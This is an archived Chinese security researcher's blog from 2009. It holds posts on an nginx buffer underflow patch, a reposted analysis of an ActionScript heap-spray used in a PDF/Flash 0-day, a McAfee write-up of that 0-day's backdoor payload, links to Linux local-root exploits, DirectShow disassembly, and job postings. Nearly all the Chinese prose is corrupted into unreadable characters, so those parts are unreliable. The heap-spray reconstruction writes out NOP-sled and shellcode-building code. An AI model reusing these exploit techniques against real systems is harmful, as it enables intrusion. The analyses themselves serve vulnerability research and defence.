alert7 blog

2009��ĵ�һ��ѩ

WeiWang_blog — 2009-11-01 19:58

2009��ĵ�һ��ѩ,��Ǻܼ�ʱ��....

��Ѿ��Ͼ��10��Сʱ��

��Ͼ��˷ɻ��˷ɻ�...

��֪��Ƿ�Ҫ��»��ס��,��Ƿ��ܹ��ﱱ��..

update: ��賿1�㵽�˱��.
��Ĭ�Ϸ�� 鿴��

NEVER USE syslog FUNCTION in signal handler

WeiWang_blog — 2009-09-18 10:52

��׼��˵Ӧ��:��Ҫ��signal handler��ò��thread-safe ��

��openssh CVE-2006-5051��,syslog��һ��not thread-safe��.

��ǵü��ǰ�и�sendmail��©��,�Ǹ�©��ĸ��:
��Ҫ��signal handler��ʹ��static��.
��Tips �鿴��

[updated]Nginx ngx_http_parse_complex_uri() buffer underflow vulnerability

WeiWang_blog — 2009-09-17 12:04

[UPDATED 2009-9-17]
��л��ĵ��,��Ѿ��ܴ��.
Ĭ��Ϳ��Դ��heap overflow. ��Σ�ջ��Ǻܴ��.

///////////////
��ͦ��ص�,http://www.kb.cert.org/vuls/id/180065
�о��һСʱ��ʱû�ܴ��©��,�ȷ��, ��λ��Ϻ�ܰ��,��֤��Ļ��ݴ��Ǹ��ط�? ��ʱû�ܹ��ݵ��Ǹ��ط�.

��Ƚϼ�,heap overflow

Index: src/http/ngx_http_parse.c
===================================================================
--- src/http/ngx_http_parse.c (revision 2410)
+++ src/http/ngx_http_parse.c (revision 2411)
@@ -1134,11 +1134,15 @@
 #endif
             case '/':
                 state = sw_slash;
-                u -= 4;
-                if (u < r->uri.data) {
-                    return NGX_HTTP_PARSE_INVALID_REQUEST;
-                }
-                while (*(u - 1) != '/') {
+                u -= 5;
+                for ( ;; ) {
+                    if (u < r->uri.data) {
+                        return NGX_HTTP_PARSE_INVALID_REQUEST;
+                    }
+                    if (*u == '/') {
+                        u++;
+                        break;
+                    }
                     u--;
                 }
                 break;

�Ķ�ȫ��
���� 鿴��

[fw]Heap Spraying with Actionscript

WeiWang_blog — 2009-07-25 11:54

��ļ��ĵ�

http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html

Heap Spraying with Actionscript

Why turning off Javascript won't help this time

Introduction

As you may have heard, there's a new Adobe PDF-or-Flash-or-something 0-day in the wild. So this is a quick note about how it's implemented, but this blog post is not going to cover any details about the exploit itself.

Background Summary

Most of the Acrobat exploits over the last several months use the, now common, heap spraying technique, implemented in Javascript/ECMAscript, a Turing complete language that Adobe thought would go well with static documents. (Cause that went so well for Postscript) (Ironically, PDF has now come full circle back to having the features of Postscript that it was trying to get away from.) The exploit could be made far far less reliable, by disabling Javascript in your Adobe Acrobat Reader.

But apparently there's no easy way to disable Flash through the UI. US-CERT recommends renaming the %ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll and %ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll files. [Edit: Actually the source for this advice is the Adobe Product Security Incident Response Team (PSIRT).]

Anyway, here's why�� Flash has it's own version of ECMAScript called Actionscript, and whoever wrote this new 0-day, finally did something new by implementing the heap-spray routine with Actionscript inside of Flash.

Details

Actionscript is tokenized/compiled into an instruction set for an Actionscript Virtual Machine [AVM¹] and it retains much of the same shape in bytecode form, as the original Actionscript source. This makes it fairly easy to de-compile the byte code back into something easier to read. For example: [Original flash filename replaced with xxxxx here]


     constructor * [public]xxxxx_fla::MainTimeline=()(0 params, 0 optional)
     [stack:3 locals:1 scope:10-11 flags:]
     {
         00000) + 0:0 getlocal_0
         00001) + 1:0 pushscope
         00002) + 0:1 getlocal_0
         00003) + 1:1 constructsuper 0 params
         00004) + 0:1 findpropstrict [public]::addFrameScript
         00005) + 1:1 pushbyte 0
         00006) + 2:1 getlex [packageinternal]xxxxx_fla::frame1
         00007) + 3:1 callpropvoid [public]::addFrameScript, 2 params
         00008) + 0:1 returnvoid
     }

This may be incorrect, because I'm using only the fantastic power of my own brain to decompile this, but this is approximately what it says in English, er I mean Actionscript:

var whatever:MovieClip = new MovieClip();
     whatever:addframeScript(0, frame1);

And then frame1 [see Appendix] is vaguely like this:

function frame1():void {
    var a:String = "\13\13\13\13";
    var b:String = "\0c\0c\0c\0c"; // A heap address, and effectively x86 NOPs
    while ( b.length < 0x1000000 ) {
       b = b + a;
    }
    // This brings us to instruction line 18 (see below)
    var byteArr:ByteArray = new ByteArray(); // lines 19 thru 22
    byteArr.writeByte(0x40); // lines 23 thru 34
    byteArr.writeByte(0x40);
    byteArr.writeByte(0x40);
    byteArr.writeByte(0x40);

    // lines 36 thru 46     
    while (byteArr.length < 64 * 0x100000) {
       byteArr.writeMultiByte(b, "iso-8859-1");
    }

    // line 47 onwards
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x81); // 81EC 20010000 �� SUB ESP,0x120
    byteArr.writeByte(0xEC);
    byteArr.writeByte(0x20);
    byteArr.writeByte(0x01);
    byteArr.writeByte(0x00);
    byteArr.writeByte(0x00);
    // etc. etc. etc. building up the shellcode one byte at a time
}

Appendix

This is the output from the excellent SWFTools.


     slot 0: var [public]::a:NULL
     slot 0: var [public]::byteArr:[public]flash.utils::ByteArray
     slot 0: var [public]::b:NULL
      method * [packageinternal]xxxxx_fla::frame1=()(0 params, 0 optional)
     [stack:3 locals:1 scope:10-11 flags:] slot:0
     {
         00000) + 0:0 getlocal_0
         00001) + 1:0 pushscope
         00002) + 0:1 findproperty [public]::b
         00003) + 1:1 pushstring "\0c\0c\0c\0c"
         00004) + 2:1 initproperty [public]::b
         00005) + 0:1 findproperty [public]::a
         00006) + 1:1 pushstring "\13\13\13\13"
         00007) + 2:1 initproperty [public]::a
         00008) + 0:1 jump ->15

         00009) + 0:1 label
         00010) + 0:1 findproperty [public]::b
         00011) + 1:1 getlex [public]::b
         00012) + 2:1 getlex [public]::a
         00013) + 3:1 add
         00014) + 2:1 initproperty [public]::b

         00015) + 0:1 getlex [public]::b
         00016) + 1:1 getproperty {
                      [private]NULL,[public]"",
                      [private]NULL,[public]xxxxx_fla,
                      [packageinternal]xxxxx_fla,
                      [namespace]http://adobe.com/AS3/2006/builtin,
                      [public]adobe.utils,
                      [public]flash.accessibility,
                      [public]flash.display,
                      [public]flash.errors,
                      [public]flash.events,
                      [public]flash.external,
                      [public]flash.filters,
                      [public]flash.geom,
                      [public]flash.media,
                      [public]flash.net,
                      [public]flash.printing,
                      [public]flash.system,
                      [public]flash.text,
                      [public]flash.ui,
                      [public]flash.utils,
                      [public]flash.xml,
                      [protected]xxxxx_fla:MainTimeline,
                      [staticprotected]xxxxx_fla:MainTimeline,
                      [staticprotected]flash.display:MovieClip,
                      [staticprotected]flash.display:Sprite,
                      [staticprotected]flash.display:DisplayObjectContainer,
                      [staticprotected]flash.display:InteractiveObject,
                      [staticprotected]flash.display:DisplayObject,
                      [staticprotected]flash.events:EventDispatcher,
                      [staticprotected]Object
                      }::length

         00017) + 1:1 pushint 1048576
         00018) + 2:1 iflt ->9

         00019) + 0:1 findproperty [public]::byteArr
         00020) + 1:1 findpropstrict [public]flash.utils::ByteArray
         00021) + 2:1 constructprop [public]flash.utils::ByteArray, 0 params
         00022) + 2:1 initproperty [public]::byteArr
 
         00023) + 0:1 getlex [public]::byteArr
         00024) + 1:1 pushbyte 64
         00025) + 2:1 callpropvoid [public]::writeByte, 1 params
         00026) + 0:1 getlex [public]::byteArr
         00027) + 1:1 pushbyte 64
         00028) + 2:1 callpropvoid [public]::writeByte, 1 params
         00029) + 0:1 getlex [public]::byteArr
         00030) + 1:1 pushbyte 64
         00031) + 2:1 callpropvoid [public]::writeByte, 1 params
         00032) + 0:1 getlex [public]::byteArr
         00033) + 1:1 pushbyte 64
         00034) + 2:1 callpropvoid [public]::writeByte, 1 params
         00035) + 0:1 jump ->41

         00036) + 0:1 label
         00037) + 0:1 getlex [public]::byteArr
         00038) + 1:1 getlex [public]::b
         00039) + 2:1 pushstring "iso-8859-1"
         00040) + 3:1 callpropvoid [public]::writeMultiByte, 2 params
         00041) + 0:1 getlex [public]::byteArr
         00042) + 1:1 getproperty [public]::length
         00043) + 1:1 pushint 1048576
         00044) + 2:1 pushbyte 64
         00045) + 3:1 multiply
         00046) + 2:1 iflt ->36

         00047) + 0:1 getlex [public]::byteArr
         00048) + 1:1 pushshort 144
         00049) + 2:1 callpropvoid [public]::writeByte, 1 params
         00050) + 0:1 getlex [public]::byteArr
         00051) + 1:1 pushshort 144
         00052) + 2:1 callpropvoid [public]::writeByte, 1 params
         00053) + 0:1 getlex [public]::byteArr
         00054) + 1:1 pushshort 144
         00055) + 2:1 callpropvoid [public]::writeByte, 1 params
         00056) + 0:1 getlex [public]::byteArr
         00057) + 1:1 pushshort 144
         00058) + 2:1 callpropvoid [public]::writeByte, 1 params
         00059) + 0:1 getlex [public]::byteArr
         00060) + 1:1 pushshort 144
         [��]

And as Bojan Zdrnja at ISC points out, there are two different shellcode payloads being used. I might write something more about these tomorrow (no promises). Most of the changed lines in this diff, are just jump offsets, which are different between the two, as there was some code added/deleted between them, and I haven't normalized this yet.

��

��baidu blog��ƣ��ʡ��

�Ķ�ȫ��
����ɽ֮�� 鿴��

pdf/flash 0day ��

WeiWang_blog — 2009-07-23 11:05

��λ��÷����׼��

http://blogs.adobe.com/psirt/2009/07/update_on_adobe_reader_acrobat.html

˭��?

http://www.avertlabs.com/research/blog/index.php/2009/07/22/new-0-day-attacks-using-pdf-documents/

New 0-Day Attacks Using PDF Documents

Wednesday July 22, 2009 at 7:47 pm CST
Posted by Vitaly Zaytsev

Trackback

As we already mentioned multiple times in the past, exploits that takes advantage of a newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence are showing 0-day attacks remain the preferred choice of cyber criminals.

Today, a new unpatched Adobe vulnerability has been discovered in the wild that takes advantage of a newly added feature to add interactive Flash (SWF) content into PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2 , as well as Adobe Flash Player 9 or newer.

In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted FWS files were embedded into PDF documents, that can cause Adobe Reader to execute arbitrary code upon viewing. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

It first gets KERNEL32.dl image base using the Windows PEB structure, sets up the required Windows APIs, the decrypts and executes its malware payload. This specific malicious PDF file contains 3 embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE, sends the information gathered from the infected machine to a free host redirection services based in China:

[blocked].3322.org
[blocked].2288.org.

The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.

According to Adobe, the “Rich Media” annotation is new to Acrobat 9.x and will not be understood by PDF document viewers that can only support up to Acrobat 8 specifications. Thus, if you place the SWF file with Acrobat 9 into the PDF files, it is not readable by Acrobat or Adobe Reader 8 and older versions, and will not vulnerable to this attack.

While details of this vulnerability are not yet made public, more attackers are likely to take advantage of this critical as in past incidents. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (July 21st, 2009).

Even though anti-malware vendors continue to add detection for new 0-day threats, there are several things which you can do to mitigate such risks. Users are advised to refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

This bug is currently being investigated by the Adobe Product Security Incident Response Team.

(Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)

�Ķ�ȫ��
����Ŷ�̬ �鿴��

��ڵ�Linux Kernel tun_char_poll NULL Pointer Dereference 0day

WeiWang_blog — 2009-07-18 12:04

http://www.milw0rm.com/exploits/9191

��˵��.

��linux kernel 0day��,��λ��Ҳ��̫��, /dev/net/tun�ںܶ�ϵͳ�϶��ͨ�û��Զ�д��.

crw------------ 1 root root 10,200 Jul 18 07:26 /dev/net/tun.

FC5,RHEL5.8 ��Ȩ��.

��ͨ�û��ܶ�д,�ʹ��kernel©��,��exploitҲ��Ч��.

ϵͳ��Ա��ļ�Ȩ��Ƿ��,��粻�ǵĻ�,��ȥ��ͨ�û��Ķ�дȨ�޾Ϳ��ֹ��.

��exploit codeֵ�úú��о��,��潲��˼��.
��Selinux disable��mmap 0��Ӧ�ó��ռ�ȥ
��Selinux enable��mmap 0��Ӧ�ó��ռ�ȥ

�ǵ��ǰ�ڵ�һ��0x557�ļ��Ҳ��һ�� ,��Ŀ�е��,��exploit Linux Kernel NULL Pointer Dereference. �Ķ�ȫ��
���� 鿴��

��Ϊquartz.dll��һ��Ƿ��quicktime�ļ��Ľӿ��

WeiWang_blog — 2009-07-17 22:16

quartz.dll��quicktime�ļ��Ĵ��ʵ��̫��.
��©��.

CVE-2009-1537
CVE-2009-1538
CVE-2009-1539

��β��,��߲��,��directshow 0day��治ת��.

�򵥿��޲��Ĵ��,һ��ʼ��Ϊquartz.dll��һ��Ƿ��quicktime�ļ��Ľӿ��
HKEY_CURRENT_USER, Software\\Microsoft\\Multimedia\\DirectShow
SkipQTParse

է��ֻ��ô��,��ò��,��Ҫ�ľ��Ľӿ�. ��quartz.dll�ŷ��ֲ��ô��ô��.

�ýӿ��ƴ��Ƿ�ִ��VerifyQTFile��(�ú��У��atom size��).

��Ա��SkipQTParse��Ӧ��quicktime parse��. ��ƴ��Ƿ�ִ��VerifyQTFile��. �Ƿ�Ҳ��һ��bug?

.text:7D05C784                 mov     [ebp+var_50], eax
.text:7D05C787                 lea     eax, [ebp+hKey]
.text:7D05C78A                 push    eax             ; phkResult
.text:7D05C78B                 push    20019h          ; samDesired
.text:7D05C790                 push    esi             ; ulOptions
.text:7D05C791                 push    offset aSoftwareMic_11 ; "Software\\Microsoft\\Multimedia\\DirectSho"...
.text:7D05C796                 push    80000001h       ; hKey
.text:7D05C79B                 mov     dword ptr [ebp+Data], esi
.text:7D05C79E                 mov     [ebp+hKey], esi
.text:7D05C7A1                 mov     [ebp+cbData], 4
.text:7D05C7A8                 call    ds:__imp__RegOpenKeyExW@20 ; RegOpenKeyExW(x,x,x,x,x)
.text:7D05C7AE                 test    eax, eax
.text:7D05C7B0                 jnz     short loc_7D05C7D3
.text:7D05C7B2                 lea     eax, [ebp+cbData]
.text:7D05C7B5                 push    eax             ; lpcbData
.text:7D05C7B6                 lea     eax, [ebp+Data]
.text:7D05C7B9                 push    eax             ; lpData
.text:7D05C7BA                 push    esi             ; lpType
.text:7D05C7BB                 push    esi             ; lpReserved
.text:7D05C7BC                 push    offset aSkipqtparse ; "SkipQTParse"
.text:7D05C7C1                 push    [ebp+hKey]      ; hKey
.text:7D05C7C4                 call    ds:__imp__RegQueryValueExW@24 ; RegQueryValueExW(x,x,x,x,x,x)
.text:7D05C7CA                 push    [ebp+hKey]      ; hKey
.text:7D05C7CD                 call    ds:__imp__RegCloseKey@4 ; RegCloseKey(x)
.text:7D05C7D3
.text:7D05C7D3 loc_7D05C7D3:                           ; CODE XREF: CQT::CreateOutputPins(void)+145 j
.text:7D05C7D3                 cmp     dword ptr [ebp+Data], esi
.text:7D05C7D6                 jnz     short loc_7D05C7EA
.text:7D05C7D8                 push    esi
.text:7D05C7D9                 push    edi
.text:7D05C7DA                 push    [ebp+var_30]
.text:7D05C7DD                 call    ?VerifyQTFile@@YGHPAEKK@Z ; VerifyQTFile(uchar *,ulong,ulong)
.text:7D05C7E2                 test    eax, eax
.text:7D05C7E4                 jz      loc_7D05D10B
.text:7D05C7EA
.text:7D05C7EA loc_7D05C7EA:                           ; CODE XREF: CQT::CreateOutputPins(void)+16B j
.text:7D05C7EA                 push    'dhvm'
.text:7D05C7EF                 push    [ebp+var_50]
.text:7D05C7F2                 lea     eax, [ebp+var_3C]
.text:7D05C7F5                 push    eax
.text:7D05C7F6                 lea     eax, [ebp+var_38]
.text:7D05C7F9                 push    eax
.text:7D05C7FA                 lea     eax, [ebp+var_30]
.text:7D05C7FD                 push    eax
.text:7D05C7FE                 mov     ecx, ebx
.text:7D05C800                 call    ?QTDescend@CQT@@AAEHAAPAEAAK0PAEK@Z ; CQT::QTDescend(uchar * &,ulong &,uchar * &,uchar *,ulong)
.text:7D05C805                 test    eax, eax

�Ķ�ȫ��
���� 鿴��

��һ��0day��Tuesday 0day

WeiWang_blog — 2009-07-15 22:58

��Ĭ�Ϸ�� 鿴��

[fw]��Կ��ܳ�Ϊδ��ڿ͹��

WeiWang_blog — 2009-07-13 19:53

Ҫ��ǰѴ��Ϊֻ��Ϊ��.

http://tech.sina.com.cn/d/2009-07-13/08563257000.shtml

�õ��Թ��

��һЩ�˿��ܻ��ʣ��ڿ�ΪʲôҪ��˵Ĵ��ԣ��о��Ա�Դ˱�ʾ��õ��Ե��±��ı��2007��11�º�2008��3�£��񶾵ĳ��Ա��ﲡ��վ——��Ķ��ӵ��ҳ��——��ʹһЩ��ͼƬ��еĻ��߷��

��ѧ�о��о��ִ��(Tamara Denning)��ʾ��“��ζ��¼��ʵ֤��ȷ��һЩ��ն��ͼ��õ��ƻ��˽��װ��Խ��ռ��¡�”

��ĳЩ��£��Ҳ��ϣ��Լ��װ�á��ڿ��Ƽ�֫��װ��——�Բ�ȡ��߷�ʽ——��ͬ��ǣ��ܶ��Դ̼��źš��Щװ�ÿ��û��“�Կ�ҩ��”��ͨ��ߴ��“��”�Ļ�Ծ�Ը��߻��ʹ�ࡣ

�Ķ�ȫ��
����Ŷ�̬ �鿴��

a typo == a vulnerability Ҳ̸��DirectShow MPEG2 0day

WeiWang_blog — 2009-07-06 21:41

һ��typo,��MS�ĳ��Ա��ʱ��ɨ��¼��̣��һ��&�� ,��һ��صİ�ȫ��⡣
��Ĵ��Ӧ��Լ��򵥲��¾Ϳ��Բ��Գ��ģ��ѵ��û��ô��Ծͷ��˳��

ReadFromStream(LPSTREAM ppvData)
{
        SafeArrayCreate(xx,x, user_controlled_len);
        SafeArrayAccessData(xx,& ppvData);
        ReadFile(x,& ppvData, user_controlled_len);// ��ȷ��д��Ӧ�� ReadFile(x, ppvData, user_controlled_len)

}

.text:59F0D732                 lea     eax, [ebp+ppvData]
.text:59F0D735                 push    eax             ; ppvData
.text:59F0D736                 push    ebx             ; psa
.text:59F0D737                 call    ds:__imp__SafeArrayAccessData@8 ; SafeArrayAccessData(x,x)
.text:59F0D73D                 test    eax, eax
.text:59F0D73F                 jl      short loc_59F0D7BD
.text:59F0D741                 mov     eax, [edi]
.text:59F0D743                 push    0
.text:59F0D745                 push    [ebp+dwSize]    ; come from file
.text:59F0D748                 lea     ecx, [ebp+ppvData]
.text:59F0D74B                 push    ecx
.text:59F0D74C                 push    edi
.text:59F0D74D                 call    dword ptr [eax+0Ch] ; mshtml!FatStream::Read stack buffer overflow here
.text:59F0D750                 push    ebx             ; psa

��killbit��
0955AC62-BF2E-4CBA-A2B9-A63F772D46CF �Ķ�ȫ��
���� 鿴��

[CLOSED]��ڱ��Ʒ��

WeiWang_blog — 2009-04-29 08:43

��ѵã��Ȥ��ͬ��Ӣ�ļ�� alert7 at gmail.com . ��ӦƸ��Ǽ��Ʒ��

Technical product manager job description

Description of Function and Responsibilities: The technical product manager will be responsible for technical marketing documentation and presentations for McAfee’s network security products. We are looking for a highly motivated professional with a proven track record of successfully driving and marketing products in the network security space. Strong technical skills are required to understand McAfee’s network security products, architecture, feature details, and operational workflow and communicate to customers and train McAfee sales. This position requires strong communication skills to initiate and drive programs aimed at increasing market awareness and share.
•    Training of McAfee and partner sales engineers
•    Sales support including detailed technical explanations of McAfee technology and products, preparation of RFP/RFI responses, and support of McAfee sales partners
•    Creation of technical sales collateral including technical white papers, applications notes, and presentations
•    Develop required technical sales collateral for specific vertical market segments
•    Participation in standards activities and partnering opportunities
•    Hosting customer visits, speaking at technical seminars and representing McAfee at trade shows
•    Support trade show demonstrations and industry-wide technical events including technology "plugfests"
•    Design, implementation, and delivery of product demonstrations for McAfee customers and partners

Experience Required:
•    5+ years of hands-on experience in networking and network security
•    Proven analytical and problem solving skills
•    Professional and time-efficient approach to the role; self disciplines, working with minimal supervision
•    Excellent verbal, written and presentation skills; ability to create and execute structured presentations and demonstrations to groups of people
•    Experience with switches, routers, servers, Microsoft and Linux operating systems, and network security products including firewall, IDS/IPS, NAC is highly desired

Qualifications/Education:
•    Requires a Bachelor of Science in Engineering or Computer; Master's degree is preferred. A CCIE certification or equivalent highly desirable

�Ķ�ȫ��
��Ĭ�Ϸ�� 鿴��

[CLOSED]��ڱ��3��ȫ�о��Ա

WeiWang_blog — 2009-04-27 08:35

��ѵã��Ȥ�Ļ��԰��Ӣ�ļ��ʼ�� alert7 at gmail.com ��

Web security, P2P/IM Security Researcher

Description:

McAfee Avert Labs is looking for seasoned security researchers to contribute in the investigation, detection, and prevention of threats on Web services/servers, peer-to-peer (P2P) and instant-messenger (IM) for our industry leading network security solutions.

Responsibilities:

The main responsibilities for this position focus on threats for the APAC region:

�� Perform leading edge Web and P2P/IM threat research and analysis with one of the world’s most respected research teams, McAfee Avert Labs

�� Develop signatures or algorithms to detect and block the threats.

Qualifications:

The qualified candidates are expected to possess:

�� 3-5 years direct or equivalent experience in areas of networking/system administration, P2P/IM/protocols security analysis and response, and software development

�� Expert knowledge on web security, web related malware, concepts like SQL injection, XSS, Web 2.0 threats, etc

�� Expert knowledge of P2P/IM protocols, such as BitTorrent, Edonkey, Skype, QQ, Xunlie etc

�� Proficient with at least one scripting language (perl, python, etc)

�� Proficient RFC level working knowledge of networking protocols including: TCP/IP, HTTP, DNS, HTTPS, etc

�� Proficient with network traffic analysis tools such as wireshark/tcpdump, TCPView, Linux-iptables/libipq, etc

�� Network based IPS knowledge and experience a definite plus

�� Strong problem solving, troubleshooting, & analytical skills

�� Experience of working in fast-paced development environments

�� Good written & verbal communication skills

�� Good inter-personal and teamwork skills

Personality:
Self-driven, proactive, hardworking, team-player

Education:
BS/MS in computer science or equivalent experience

�Ķ�ȫ��
����Ŷ�̬ �鿴��

˵��core dump file,�뵽��2005��ʹ��һ��⣺solaris...

WeiWang_blog — 2009-04-25 00:15

˵��core dump file,�뵽��2005��ʹ��һ��⡣

solaris��һ��ֻ��ִ�е��ļ��Ի��ļ��Ƿ�Ϊ©��

http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2005-09/0386.html

Ҳ��ͨ��core dumpfile�ֶλ�õ��ļ��ݡ�

��ʱ��linux��Ѿ�û��solaris�ϵ��ˡ��Ͱ�ȫ��Ϊlinux��solaris��ȫ�Ķ࣬��kernel ��libc. ��ǰ��̳�ϻ��۹�setuid shell�İ�ȫ��⣬�Ա��linux��ǰ�档

�õ��˶��ˣ��ñ�¶�İ�ȫ��Ҳ�ͱ�¶�ˡ��windows�Ƚ϶࣬�о�windowsҲ�ߵĲ��

�Ķ�ȫ��
���� 鿴��

about Linux kernel <2.6.29 exit_notify() local root exploit

WeiWang_blog — 2009-04-24 21:02

��Ȼ��udev�Ǹ�©��Ҳ��˵˵��Linux kernel <2.6.29 exit_notify() exploit.

http://www.milw0rm.com/exploits/8478

1: /proc/sys/fs/suid_dumpable ��1 or 2��Ĭ�Ϻ��󲻿��
2: ��һ��Ļ��⵹�Ǹ��©��Ҳ˵��뵽��ǰ�Ǹ�
prctl(PR_SET_DUMPABLE,2)©��÷��һ�¡�
3�� exploit��Ҫ��24Сʱ��ʵ��Ҫ��һ��Ϳ��̵�һ��Сʱ��core�ļ��ʽ��Щϵͳ��core.xxxx ,�Լ��޸İɡ�
���� 鿴��

WeiWang_blog — 2009-04-24 14:54

��linux kernel��©�� Ǹ��ǳ��õ�Ӧ�ó��©��
http://www.milw0rm.com/exploits/8478

udevd��̴��û��ݲ��µ��ִ��©��ʵа��Ļ��LD_PRELOAD��

int udev_event_execute_run(struct udev_event *event)
{
    struct udev_list_entry *list_entry;
    int err = 0;

    dbg(event->udev, "executing run list\n");
    udev_list_entry_foreach(list_entry, udev_list_get_entry(&event->run_list)) {
        const char *cmd = udev_list_entry_get_name(list_entry);

        if (strncmp(cmd, "socket:", strlen("socket:")) == 0) {
            struct udev_monitor *monitor;

            monitor = udev_monitor_new_from_socket(event->udev, &cmd[strlen("socket:")]);
            if (monitor == NULL)
                continue;
            udev_monitor_send_device(monitor, event->dev);
            udev_monitor_unref(monitor);
        } else {
            char program[UTIL_PATH_SIZE];
            char **envp;

            util_strlcpy(program, cmd, sizeof(program));
            udev_event_apply_format(event, program, sizeof(program));
            if (event->trace)
                fprintf(stderr, "run %s (%llu) '%s'\n",
                       udev_device_get_syspath(event->dev),
                       udev_device_get_seqnum(event->dev),
                       program);
            envp = udev_device_get_properties_envp(event->dev);
            if (util_run_program(event->udev, program, envp, NULL, 0, NULL) != 0) {
                if (!udev_list_entry_get_flag(list_entry))
                    err = -1;
            }
        }
    }
    return err;

�Ķ�ȫ��
���� 鿴��

alert7 blog

2009�����ĵ�һ��ѩ

NEVER USE syslog FUNCTION in signal handler

[updated]Nginx ngx_http_parse_complex_uri() buffer underflow vulnerability

[fw]Heap Spraying with Actionscript

Heap Spraying with Actionscript

Why turning off Javascript won't help this time

Introduction

Background Summary

Details

Appendix

pdf/flash 0day ����

New 0-Day Attacks Using PDF Documents

�������ڵ�Linux Kernel tun_char_poll NULL Pointer Dereference 0day

����Ϊquartz.dll������һ���Ƿ����quicktime�ļ��Ľӿ���

��һ��0day��Tuesday 0day

[fw]���������Կ��ܳ�Ϊδ���ڿ͹�������

a typo == a vulnerability Ҳ̸���������DirectShow MPEG2 0day

[CLOSED]���������ڱ�����������������Ʒ����

[CLOSED]���������ڱ�������3����ȫ�о���Ա

˵��core dump file,�뵽����2005���ʹ���һ�����⣺solaris...

about Linux kernel <2.6.29 exit_notify() local root exploit

�ⲻ��һ��linux�ں�©����ȷ��һ���ǳ����õ�©��

2009��ĵ�һ��ѩ

pdf/flash 0day ��

��ڵ�Linux Kernel tun_char_poll NULL Pointer Dereference 0day

��Ϊquartz.dll��һ��Ƿ��quicktime�ļ��Ľӿ��

[fw]��Կ��ܳ�Ϊδ��ڿ͹��

a typo == a vulnerability Ҳ̸��DirectShow MPEG2 0day

[CLOSED]��ڱ��Ʒ��

[CLOSED]��ڱ��3��ȫ�о��Ա

˵��core dump file,�뵽��2005��ʹ��һ��⣺solaris...

�ⲻ��һ��linux�ں�©��ȷ��һ��ǳ��õ�©��